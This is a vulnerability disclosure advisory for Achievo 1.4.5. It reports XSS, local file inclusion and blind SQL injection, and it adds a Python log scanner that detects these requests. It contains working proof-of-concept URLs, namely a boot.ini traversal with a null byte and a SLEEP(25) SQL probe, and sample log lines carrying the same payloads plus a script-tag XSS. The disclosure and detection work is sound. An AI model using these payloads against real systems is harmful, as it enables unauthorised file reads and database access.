Information
--------------------
Name : XSS, LFI and SQL Injection Vulnerabilities in Achievo
Software : Achievo 1.4.5 and possibly below.
Vendor Homepage : http://www.achievo.org
Vulnerability Type : Cross-Site Scripting, Local File Inclusion and SQL
Injection
Severity : Critical
Researcher : Canberk Bolat
Advisory Reference : NS-12-016

Description
--------------------
Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities enable
organisations to support their business processes in a simple but
effective manner.

Details
--------------------
Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in
version 1.4.5.

XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid,
atkselector, atkfilter, searchString)

LFI:
http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3

SQL Injection:
http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3

You can read the full articles about Cross-Site Scripting, LFI and SQL
Injection vulnerabilities here:

Cross-site Scripting (XSS):
http://www.mavitunasecurity.com/crosssite-scripting-xss/
Local File Inclusion: http://www.mavitunasecurity.com/local-file-inclusion/
Blind SQL Injection: http://www.mavitunasecurity.com/blind-sql-injection/

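As an added detection example (not part of this advisory or of the Achievo project), the Python script below scans constructed Apache-style access log lines for requests to dispatch.php that carry the three patterns described above: directory traversal or a null byte in atknodetype, a time-based SQL probe such as SLEEP() in any parameter, and tag-like markup in the parameters the advisory lists as reflected. The assumption that a legitimate atknodetype value has the shape module.node is mine, not something the advisory states.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the advisory lists as reflected into the page (XSS), lower-cased.
XSS_PARAMS = {"atklevel", "atkaction", "atkstackid", "atkselector", "atkfilter", "searchstring"}
# A legitimate ATK node type has the shape "module.node" (assumption for this example).
NODE_TYPE_RE = re.compile(r"^[A-Za-z0-9_]+\.[A-Za-z0-9_]+$")
# Time-based blind SQL injection probes, like the SLEEP(25) payload in the advisory.
SQLI_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
# Tag-like markup arriving in a parameter that the application reflects.
XSS_RE = re.compile(r"<\s*/?\s*[a-z]", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed access log lines (not real traffic); line 1 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2012:10:00:01 +0000] "GET /dispatch.php?atknodetype=employee.employee&atkaction=view HTTP/1.1" 200 512
10.0.0.5 - - [01/Nov/2012:10:00:02 +0000] "GET /dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3 HTTP/1.1" 200 77
10.0.0.5 - - [01/Nov/2012:10:00:03 +0000] "GET /achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1 HTTP/1.1" 200 2048
10.0.0.5 - - [01/Nov/2012:10:00:04 +0000] "GET /dispatch.php?atknodetype=employee.employee&atkaction=view&atkfilter=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 600
"""

def classify_request(url):
    """Return (tag, parameter) findings for one request URL; empty if nothing matches."""
    findings = []
    parts = urlsplit(url)
    if not parts.path.endswith("/dispatch.php"):
        return findings
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        key = name.lower()
        for raw in values:
            # parse_qs decoded once; a second pass exposes double-encoded sequences.
            value = unquote(raw)
            if key == "atknodetype" and (".." in value or "\x00" in value
                                         or not NODE_TYPE_RE.match(value)):
                findings.append(("lfi", name))
            if SQLI_RE.search(value):
                findings.append(("sqli", name))
            if key in XSS_PARAMS and XSS_RE.search(value):
                findings.append(("xss", name))
    return findings

def scan_log(text):
    """Walk access log text and return (line number, tag, parameter) alerts."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match:
            alerts.extend((lineno, tag, param) for tag, param in classify_request(match.group(1)))
    return alerts
```

Running scan_log(SAMPLE_LOG) reports the LFI, SQL injection and XSS attempts on lines 2, 3 and 4 and stays silent on the benign first line.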
Solution
--------------------
-

Advisory Timeline
--------------------
23/01/2011 - First contact
25/02/2012 - Second contact - No response
01/11/2012 - Advisory released

Credits
--------------------
It was discovered during testing with Netsparker, Web Application Security
Scanner - http://www.mavitunasecurity.com/netsparker/.

References
--------------------
Vendor Url / Patch : -
MSL Advisory Link :
http://www.mavitunasecurity.com/xss-lfi-and-sql-injection-vulnerabilities-in-achievo/
Netsparker Advisories :
http://www.mavitunasecurity.com/netsparker-advisories/

About Netsparker
--------------------
Netsparker can find and report security issues such as SQL Injection and
Cross-site Scripting (XSS) in all web applications regardless of the
platform and the technology they are built on. Netsparker's unique
detection and exploitation techniques allow it to be dead accurate in
reporting, hence it's the first and the only False Positive Free web
application security scanner.

--
Netsparker Advisories, <advisories@mavitunasecurity.com>
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/